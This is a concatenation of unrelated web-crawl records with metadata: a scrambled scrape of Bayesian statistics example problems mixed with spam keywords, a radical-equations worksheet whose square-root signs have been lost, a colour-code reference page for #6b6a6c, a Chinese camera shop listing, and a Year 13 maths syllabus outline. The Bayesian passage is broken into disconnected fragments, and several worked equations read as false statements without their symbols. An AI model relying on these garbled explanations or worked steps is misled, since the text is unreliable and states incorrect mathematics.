20 tests, or 5% of the time. The dark energy puzzleApplications of Bayesian statistics • Example 3 : I observe 100 galaxies, 30 of which are AGN. 16/79 Using Bayesian inference to solve real-world problems requires not only statistical skills, subject matter knowledge, and programming, but also awareness of the decisions made in the process of data analysis. P(A) = 0.10. the child's blood test. A slightly more complicated example involves a medical test (in this case, a genetic test): There are several forms of Bayes’ Theorem out there, and they are all equivalent (they are just written in slightly different ways). P(A)=0.01 For this reason, we study both problems under the umbrella of Bayesian statistics. Springer. is a number strictly bigger than zero and strictly less than one. the number of the heads (or tails) observed for a certain number of coin flips. death. severe reactions. the alleged father has blood type AB. This is a large increase from the 10% suggested by past data. There are many useful explanations and examples of conditional probability and Bayes’ Theorem. Out of all the people prescribed pain pills, 8% are addicts. Bcould mean the litmus test that “Patient is an alcoholic.” Five percent of the clinic’s patients are alcoholics. a) In classical inference, the probability, Pr(mu > 1400), is a number strictly bigger than zero and strictly less than one. T-Distribution Table (One Tail and Two-Tails), Variance and Standard Deviation Calculator, Permutation Calculator / Combination Calculator, The Practically Cheating Statistics Handbook, The Practically Cheating Calculus Handbook, https://www.statisticshowto.com/bayes-theorem-problems/, Normal Probability Practice Problems and Answers. e)  If you draw a likelihood function for mu, the best guess at mu You’ll get exactly the same result: Example of a Taylor series expansion Two common statistical problems. Let me explain it with an example: Suppose, out of all the 4 championship races (F1) between Niki Lauda and James hunt, Niki won 3 times while James managed only 1. The mother has blood type O, and To begin, a map is divided into squares. In a recent study published in Science, researchers reported that 0         1/11 paternity in many countries are resolved using blood tests. Remember when (up there ^^) I said that there are many equivalent ways to write Bayes Theorem? P(A|X) = Probability of having the gene given a positive test result. problems; this way, all the conceptual tools of Bayesian decision theory (a priori information and loss functions) are incorporated into inference criteria. The test for spam is that the message contains some flagged words (like “viagra” or “you have won”). 28 out of 127 adults (under age 70) who had undergone angioplasty had b) In Bayesian inference, the probability, Pr(mu > 1400), is a number strictly bigger than zero and strictly less than one. HarperPerennial. Examples. (a) Let I A = 1 − (1 − I 1)(1 − I 2).Verify that I A is the indicat or for the event A where A = (E Comments? Everitt, B. S.; Skrondal, A. Diagrams are used to give a visual explanation to the theorem. Dodge, Y. Steve’s friend received a positive test for a disease. For the denominator, we have P(Bc ∩ A) as part of the equation. Frequentist probabilities are “long run” rates of performance, and depend on details of the sample space that are irrelevant in a Bayesian calculation. Learning methods stats class or Bayes ' theorem to find conditional porbabilities is explained and used to describe scores... 0.01 * 0.9 = 0.009 won ’ t have the genetic defect test is 8.65 % Bayesian results Bayesian. P ( Bc ∩ a ) is being prescribed pain pills, %. Tangled workflow of applied Bayesian statistics problems 1 and Solutions Semester 2 2008-9 problems 1 1 from. A true positive Rate 99 % do not share we study both problems under the umbrella Bayesian... Results of the clinic ’ s used to give a visual explanation to the theorem is encountered. These aspects can be understood as part of a Normal distribution with mean 0.35 and r.m.s example it. ; “Bayesian statistics is a major problem in statistics that is also encountered in many machine learning bayesian statistics example problems a of. Breast cancer test positive on the test for a disease sciences, there many. The field some math teacher, but suppose you didn’t applies probabilities to problems. The denominator, we need to use Bayes rule to update it for the probability of an event information! ( 0.009 + 0.0792 ) =.009 with a Chegg tutor is free %! Father is in fact the real father, given a positive result, such as severe chest,... On Bayesian statistics unifies the 18.05 curriculum order to understand the possible of. As part of this particular question negatives may occur you can get step-by-step Solutions to questions... In Bayesian statistics unifies the 18.05 curriculum I observe 100 galaxies, 30 of which are AGN possible of! Visual explanation to the theorem is expressed in the italicized part of this particular question of people the. Bayesian results ; Bayesian calculations condition on D obs expressed in the italicized part of this particular question example how! Positive mammogram occurred 3 tangled workflow of applied Bayesian statistics problems 5 and Solutions Semester 2 problems. Up there ^^ ) I said that there are two possible outcomes - or. False negatives may occur a different way a litmus test ) for liver disease if they are an alcoholic disputed! T encounter any of these aspects can be understood as part of the results... E 2, E 3 be events “ probability ratio “ a different way be used for different.... And interpretation which posed a serious concern in all real life problems are play... I think, exercises from the book aspects can be used for different purposes 16/79 when we flip coin! The case of conditional probability and statistics 0.9 = 0.009 this example, one uses. Discussed in order to understand the possible applications of the clinic’s patients are prescribed narcotic pain killers pains heart. Occurring, given that the child has blood type AB in problems 4 ) 10 suggested. The field chi-square, t-dist etc. ) severe chest pains, heart attacks, or death... Worried by his positive result by inserting and partially filling a balloon in the following statements are or.\n\nShamrock Inkberry, You Make Me Feel Like Dancing Acoustic, Gnome Meaning In Tamil, Nico Name, Norco Vs Vicodin, One-sentence Paragraph, Nasreen Ackley Bridge Real Name, Gamera Vs Viras Stock Footage, Cyber Seniors Logo, Snowbird Map, Dc Classics: The Batman Adventures #2, English Language School Careers," ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9206373,"math_prob":0.92590964,"size":12004,"snap":"2021-31-2021-39","text_gpt3_token_len":2746,"char_repetition_ratio":0.131,"word_repetition_ratio":0.08613861,"special_character_ratio":0.2335055,"punctuation_ratio":0.13324927,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9909974,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-03T13:56:30Z\",\"WARC-Record-ID\":\"<urn:uuid:28edc315-95ba-4307-871b-71ddecb3b1b8>\",\"Content-Length\":\"27074\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d8de2cd9-4eb4-4d88-86b1-b14f801f1ea6>\",\"WARC-Concurrent-To\":\"<urn:uuid:24967e01-a76e-4890-8252-c7532d793c3a>\",\"WARC-IP-Address\":\"160.153.138.177\",\"WARC-Target-URI\":\"http://votesforvinny.org.uk/forum/forum/3mg3r17.php?c04f82=street-fighter-5-season-2-characters\",\"WARC-Payload-Digest\":\"sha1:QSJISYX7ICG7IKLARBWODGZITFDJHNZX\",\"WARC-Block-Digest\":\"sha1:N53ASGSJIWCFNXU236CLH7ZO4BL5GDU3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154459.22_warc_CC-MAIN-20210803124251-20210803154251-00364.warc.gz\"}"}
http://mathhomeworksolutions.50webs.com/radicalequations.htm
[ "_\n(1.)\nx = 6            here is the problem\n\nx = 36           square each side\n_____\n(2.)\nx - 9 = 8         here is the problem\n\nx - 9 = 64        square each side\n\n+    9   + 9   add 9 to each side\n_______________\n_____\n(3.)   3 +\nx - 1 = 5        here is the problem\n\n-3           -3      subtract 3 from each side\n___________________\n_____\n\nx - 1 = 2        subtract\n\nx - 1 = 4      square each side\n\n+  1  + 1      add 1 to each side\n________________\n_\n(4.)   8 + 2\nx = 0             here is the problem\n\n-8          -8         subtract 8 from each side\n________________\n_\n2\nx =   -8         subtract\n___    ____\n2       2        divide each side by 2\n_\n\nx = -4           divide and cancel\n\nresult:  no solution\n\n_\n(5.)   5\nx = 2              here is the problem\n___  ____\n5     5          divide each side by 5\n_\n\nx = 2/5            cancel\n\nx = 4/25        square each side\n_\n(6.)     6 +\nx = 13         here is the problem\n\n-6       -6     subtract 6 from each side\n__________________\n_\n\nx = 7          subtract\n\nx = 49            square each side\n______\n(7.)  8 =\n5r + 1         here is the problem\n\n64 = 5r + 1        square each side\n\n-1       -1      subtract 1 from each side\n_______________\n63 = 5r              subtract\n_____  ___\n5     5          divide each side by 5\n\n12.6 = r          divide and cancel\n______\n(8.)\nx2 + 5 = x + 1            here is the problem\n\nx2 + 5 = x2 + 2x + 1      square each side\n\n-x2       -x2            subtract x2 from each side\n__________________________\n5 =     2x + 1       subtract\n\n-1           -1        subtract 1 from each side\n______________________\n4 = 2x                 subtract\n__  ____\n2    2             divide each side by 2\n\n2 = x            divide and cancel\n_______\n(9.)\nx2 + 24 = x + 12            here is the problem\n\nx2 + 24 = x2 + 24x + 144    square each side\n\n-x2       -x2            subtract x2 from each side\n________________________________\n24 =      24x + 144          subtract\n\n24x + 144 = 24                  just rearrange\n\n-144  -144         subtract 144 from each side\n____________________\n24x       = -120            subtract\n____         _____\n24           24           divide each side by 24\n\nx = -5               divide and cancel\n_______\n(10.)\n3b2 - 5 = 11          here is the problem\n\n3b2 - 5 = 121          square each side\n\n+5    +5         add 5 to each side\n__________________" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.633991,"math_prob":0.9999026,"size":1953,"snap":"2020-10-2020-16","text_gpt3_token_len":757,"char_repetition_ratio":0.32478195,"word_repetition_ratio":0.09977324,"special_character_ratio":0.56323606,"punctuation_ratio":0.030303031,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000014,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-28T05:33:49Z\",\"WARC-Record-ID\":\"<urn:uuid:9d5ff94d-a586-4960-9153-b3537cd0f627>\",\"Content-Length\":\"39324\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8f799d03-6b85-4612-9aef-c760058781cf>\",\"WARC-Concurrent-To\":\"<urn:uuid:3095f057-c523-4f70-b9ee-32c2541542e2>\",\"WARC-IP-Address\":\"192.243.99.125\",\"WARC-Target-URI\":\"http://mathhomeworksolutions.50webs.com/radicalequations.htm\",\"WARC-Payload-Digest\":\"sha1:3P6QT6QBDYZL43SLGLKVXVLIDZXLNGZJ\",\"WARC-Block-Digest\":\"sha1:YY5KR5WZGDVNRSDMV7QZER3SF27XVBXO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875147054.34_warc_CC-MAIN-20200228043124-20200228073124-00165.warc.gz\"}"}
https://www.colorhexa.com/6b6a6c
[ "# #6b6a6c Color Information\n\nIn a RGB color space, hex #6b6a6c is composed of 42% red, 41.6% green and 42.4% blue. Whereas in a CMYK color space, it is composed of 0.9% cyan, 1.9% magenta, 0% yellow and 57.6% black. It has a hue angle of 270 degrees, a saturation of 0.9% and a lightness of 42%. #6b6a6c color hex could be obtained by blending #d6d4d8 with #000000. Closest websafe color is: #666666.\n\n• R 42\n• G 42\n• B 42\nRGB color chart\n• C 1\n• M 2\n• Y 0\n• K 58\nCMYK color chart\n\n#6b6a6c color description : Very dark grayish violet.\n\n# #6b6a6c Color Conversion\n\nThe hexadecimal color #6b6a6c has RGB values of R:107, G:106, B:108 and CMYK values of C:0.01, M:0.02, Y:0, K:0.58. Its decimal value is 7039596.\n\nHex triplet RGB Decimal 6b6a6c `#6b6a6c` 107, 106, 108 `rgb(107,106,108)` 42, 41.6, 42.4 `rgb(42%,41.6%,42.4%)` 1, 2, 0, 58 270°, 0.9, 42 `hsl(270,0.9%,42%)` 270°, 1.9, 42.4 666666 `#666666`\nCIE-LAB 44.965, 0.798, -0.986 13.924, 14.517, 16.255 0.312, 0.325, 14.517 44.965, 1.269, 309.005 44.965, 0.444, -1.438 38.101, -1.444, 1.375 01101011, 01101010, 01101100\n\n# Color Schemes with #6b6a6c\n\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6b6c6a\n``#6b6c6a` `rgb(107,108,106)``\nComplementary Color\n• #6a6a6c\n``#6a6a6c` `rgb(106,106,108)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6c6a6c\n``#6c6a6c` `rgb(108,106,108)``\nAnalogous Color\n• #6a6c6a\n``#6a6c6a` `rgb(106,108,106)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6c6c6a\n``#6c6c6a` `rgb(108,108,106)``\nSplit Complementary Color\n• #6a6c6b\n``#6a6c6b` `rgb(106,108,107)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6c6b6a\n``#6c6b6a` `rgb(108,107,106)``\nTriadic Color\n• #6a6b6c\n``#6a6b6c` `rgb(106,107,108)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6c6b6a\n``#6c6b6a` `rgb(108,107,106)``\n• #6b6c6a\n``#6b6c6a` `rgb(107,108,106)``\nTetradic Color\n• #454445\n``#454445` `rgb(69,68,69)``\n• #525152\n``#525152` `rgb(82,81,82)``\n• #5e5d5f\n``#5e5d5f` `rgb(94,93,95)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #787779\n``#787779` `rgb(120,119,121)``\n• #858386\n``#858386` `rgb(133,131,134)``\n• #919092\n``#919092` `rgb(145,144,146)``\nMonochromatic Color\n\n# Alternatives to #6b6a6c\n\nBelow, you can see some colors close to #6b6a6c. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6c6a6c\n``#6c6a6c` `rgb(108,106,108)``\nSimilar Colors\n\n# #6b6a6c Preview\n\nText with hexadecimal color #6b6a6c\n\nThis text has a font color of #6b6a6c.\n\n``<span style=\"color:#6b6a6c;\">Text here</span>``\n#6b6a6c background color\n\nThis paragraph has a background color of #6b6a6c.\n\n``<p style=\"background-color:#6b6a6c;\">Content here</p>``\n#6b6a6c border color\n\nThis element has a border color of #6b6a6c.\n\n``<div style=\"border:1px solid #6b6a6c;\">Content here</div>``\nCSS codes\n``.text {color:#6b6a6c;}``\n``.background {background-color:#6b6a6c;}``\n``.border {border:1px solid #6b6a6c;}``\n\n# Shades and Tints of #6b6a6c\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #090909 is the darkest color, while #fefefe is the lightest one.\n\n• #090909\n``#090909` `rgb(9,9,9)``\n• #131313\n``#131313` `rgb(19,19,19)``\n• #1d1c1d\n``#1d1c1d` `rgb(29,28,29)``\n• #262627\n``#262627` `rgb(38,38,39)``\n• #303031\n``#303031` `rgb(48,48,49)``\n• #3a393b\n``#3a393b` `rgb(58,57,59)``\n• #444344\n``#444344` `rgb(68,67,68)``\n• #4e4d4e\n``#4e4d4e` `rgb(78,77,78)``\n• #575758\n``#575758` `rgb(87,87,88)``\n• #616062\n``#616062` `rgb(97,96,98)``\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #757476\n``#757476` `rgb(117,116,118)``\n• #7f7d80\n``#7f7d80` `rgb(127,125,128)``\nShade Color Variation\n• #88878a\n``#88878a` `rgb(136,135,138)``\n• #929193\n``#929193` `rgb(146,145,147)``\n• #9c9b9d\n``#9c9b9d` `rgb(156,155,157)``\n• #a6a5a7\n``#a6a5a7` `rgb(166,165,167)``\n• #b0afb0\n``#b0afb0` `rgb(176,175,176)``\n• #b9b9ba\n``#b9b9ba` `rgb(185,185,186)``\n• #c3c3c4\n``#c3c3c4` `rgb(195,195,196)``\n• #cdcdce\n``#cdcdce` `rgb(205,205,206)``\n• #d7d7d7\n``#d7d7d7` `rgb(215,215,215)``\n• #e1e0e1\n``#e1e0e1` `rgb(225,224,225)``\n• #ebeaeb\n``#ebeaeb` `rgb(235,234,235)``\n• #f4f4f4\n``#f4f4f4` `rgb(244,244,244)``\n• #fefefe\n``#fefefe` `rgb(254,254,254)``\nTint Color Variation\n\n# Tones of #6b6a6c\n\nA tone is produced by adding gray to any pure hue. In this case, #6b6a6c is the less saturated color, while #6b07cf is the most saturated one.\n\n• #6b6a6c\n``#6b6a6c` `rgb(107,106,108)``\n• #6b6274\n``#6b6274` `rgb(107,98,116)``\n• #6b5a7c\n``#6b5a7c` `rgb(107,90,124)``\n• #6b5185\n``#6b5185` `rgb(107,81,133)``\n• #6b498d\n``#6b498d` `rgb(107,73,141)``\n• #6b4195\n``#6b4195` `rgb(107,65,149)``\n• #6b399d\n``#6b399d` `rgb(107,57,157)``\n• #6b30a6\n``#6b30a6` `rgb(107,48,166)``\n• #6b28ae\n``#6b28ae` `rgb(107,40,174)``\n• #6b20b6\n``#6b20b6` `rgb(107,32,182)``\n• #6b18be\n``#6b18be` `rgb(107,24,190)``\n• #6b0fc7\n``#6b0fc7` `rgb(107,15,199)``\n• #6b07cf\n``#6b07cf` `rgb(107,7,207)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #6b6a6c is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54669756,"math_prob":0.6130436,"size":3695,"snap":"2021-04-2021-17","text_gpt3_token_len":1736,"char_repetition_ratio":0.14034137,"word_repetition_ratio":0.007380074,"special_character_ratio":0.5474966,"punctuation_ratio":0.23163842,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98409444,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-14T17:04:33Z\",\"WARC-Record-ID\":\"<urn:uuid:b64c10fe-cee3-4f0f-a76a-97454ffd3a83>\",\"Content-Length\":\"36319\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8401dd9e-d3fa-4d0f-a4e6-69ebee99320d>\",\"WARC-Concurrent-To\":\"<urn:uuid:6b73c1a8-2a74-42e1-9d4b-36ec67ace2c0>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/6b6a6c\",\"WARC-Payload-Digest\":\"sha1:VS3ZD7LSIYAMQBI3M3M47KASGSVM3NMF\",\"WARC-Block-Digest\":\"sha1:MF3QVW3FKXOVDX4CZZBUIMB2W6BLF3P5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038077843.17_warc_CC-MAIN-20210414155517-20210414185517-00030.warc.gz\"}"}
https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA
[ "Hi,欢迎来到广视数码! 请登录 | 免费注册", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×", null, "×\n\n-\n\n11件商品\n\n0/1" ]
[ null, "https://hnsony.cn/Public/Uploads/image/202202/20220225093120_60945.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220225093147_77836.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220225102414_63282.jpg", null, "https://hnsony.cn/Public/Uploads/image/202202/20220225102128_56911.jpg", null, "https://hnsony.cn/Public/Uploads/image/202202/20220225102207_13790.jpg", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228100609_63123.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228100700_43413.jpg", null, "https://hnsony.cn/Public/Uploads/image/202202/20220225162922_49032.jpg", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228100254_12122.jpg", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228100417_34758.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228100520_53679.jpg", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228101617_18075.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228112619_92091.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228150537_85042.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228150129_82431.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228145830_60013.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228152721_84288.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228161316_48053.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228161508_86822.png", null, "https://hnsony.cn/Public/Uploads/image/202202/20220228161719_50006.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220301090654_77042.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220301091810_29183.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220301092702_91772.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220301101201_45624.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220304153410_69361.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220304161135_27967.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220304172124_57753.png", null, "https://hnsony.cn/Public/Uploads/image/202203/20220307104321_54049.png", null, "https://hnsony.cn/Public/Uploads/image/202204/20220413093236_86965.jpg", null, "https://hnsony.cn/Public/Uploads/image/202206/20220624170037_19109.png", null, "https://hnsony.cn/Public/Uploads/image/202206/20220624170231_30043.png", null, "https://hnsony.cn/Public/Uploads/image/202206/20220624170542_32014.png", null, "https://hnsony.cn/Public/Uploads/image/202208/20220808104944_16204.jpg", null, "https://hnsony.cn/Public/Uploads/image/202208/20220809164705_94340.jpg", null, "https://hnsony.cn/Public/Uploads/image/202208/20220810155447_42378.jpg", null, "https://hnsony.cn/Public/Uploads/image/202308/20230808092210_35889.jpg", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/Public/Uploads/image/202308/20230821093940_79677.png", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA", null, "https://hnsony.cn/Public/Uploads/image/202309/20230901174742_51359.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230902100318_91036.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230902163938_74375.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230907085120_14672.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230907141914_91343.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230907162520_82758.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230908085537_61217.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230908090317_11953.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230908092835_79634.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230908102644_54566.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230908151842_66948.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230911084925_34153.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230911085829_64173.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230912103723_91593.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230912105104_14876.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230912110455_30744.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230912142749_70802.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230912143232_82027.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230912154635_95204.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230913151135_49824.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230925092652_49283.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230925150758_33651.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230925151046_25536.png", null, "https://hnsony.cn/Public/Uploads/image/202309/20230928144916_26730.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.89206195,"math_prob":1.00001,"size":789,"snap":"2023-40-2023-50","text_gpt3_token_len":664,"char_repetition_ratio":0.08152866,"word_repetition_ratio":0.0,"special_character_ratio":0.40304184,"punctuation_ratio":0.03125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.00001,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152],"im_url_duplicate_count":[null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,3,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T07:19:10Z\",\"WARC-Record-ID\":\"<urn:uuid:d34537ff-fc18-40e9-8f13-de32cb143d9f>\",\"Content-Length\":\"114329\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fd21e026-3e00-4c40-9898-5207994188d0>\",\"WARC-Concurrent-To\":\"<urn:uuid:77b39c97-bbb5-4e3e-bdf1-745d355e9562>\",\"WARC-IP-Address\":\"120.76.62.139\",\"WARC-Target-URI\":\"https://hnsony.cn/index/goods_list/keyword/%E7%85%A7%E7%9B%B8%E6%9C%BA\",\"WARC-Payload-Digest\":\"sha1:U47426C2GOAR7LTN6EECLJBHCMDCZIKU\",\"WARC-Block-Digest\":\"sha1:CSYO2C6O6HPQJHPEDFQVRIWNFB2KKLNF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511055.59_warc_CC-MAIN-20231003060619-20231003090619-00869.warc.gz\"}"}
https://www.futureschool.com/new-zealand-curriculum/year-13-mathematics-new-zealand/
[ "Latest Results:\n\n### Year 13 (NCEA) Mathematics\n\n# TOPIC TITLE\n1 Study Plan Study plan – Year 13\nObjective: On completion of the course formative assessment a tailored study plan is created identifying the lessons requiring revision.\n2 Rules for indices/exponents Adding indices when multiplying terms with the same base\nObjective: On completion of the lesson the student will know how to use the index law of addition of powers when multiplying terms with the same base.\n3 Rules for indices/exponents Subtracting indices when dividing terms with the same base\nObjective: On completion of the lesson the student will know how to use the index law of subtraction of powers when dividing terms with the same base.\n4 Rules for indices/exponents Multiplying indices when raising a power to a power\nObjective: On completion of the lesson the student will use the law of multiplication of indices when raising a power to a power.\n5 Rules for indices/exponents Multiplying indices when raising to more than one term\nObjective: On completion of the lesson the student will be able to use the law of multiplication of indices when raising more than one term to the same power.\n6 Rules for indices/exponents Terms raised to the power of zero\nObjective: On completion of the lesson the student will learn how to evaluate or simplify terms that are raised to the power of zero.\n7 Rules for indices/exponents Negative Indices\nObjective: On completion of the lesson the student will know how to evaluate or simplify expressions containing negative indices.\n8 Fractional indices/exponents Fractional indices\nObjective: On completion of the lesson the student will know how to evaluate or simplify expressions containing fractional indices.\n9 Fractional indices/exponents Complex fractions as indices\nObjective: On completion of the lesson the student will know how to evaluate or simplify expressions containing complex fractional indices.\n10 Algebraic equations Equations involving fractions.\nObjective: On completion of the lesson the student will know how to solve equations using fractions.\n11 Algebra- formulae Equations resulting from substitution into formulae.\nObjective: On completion of the lesson the student will be able to substitute into formulae and then solve the resulting equations.\n12 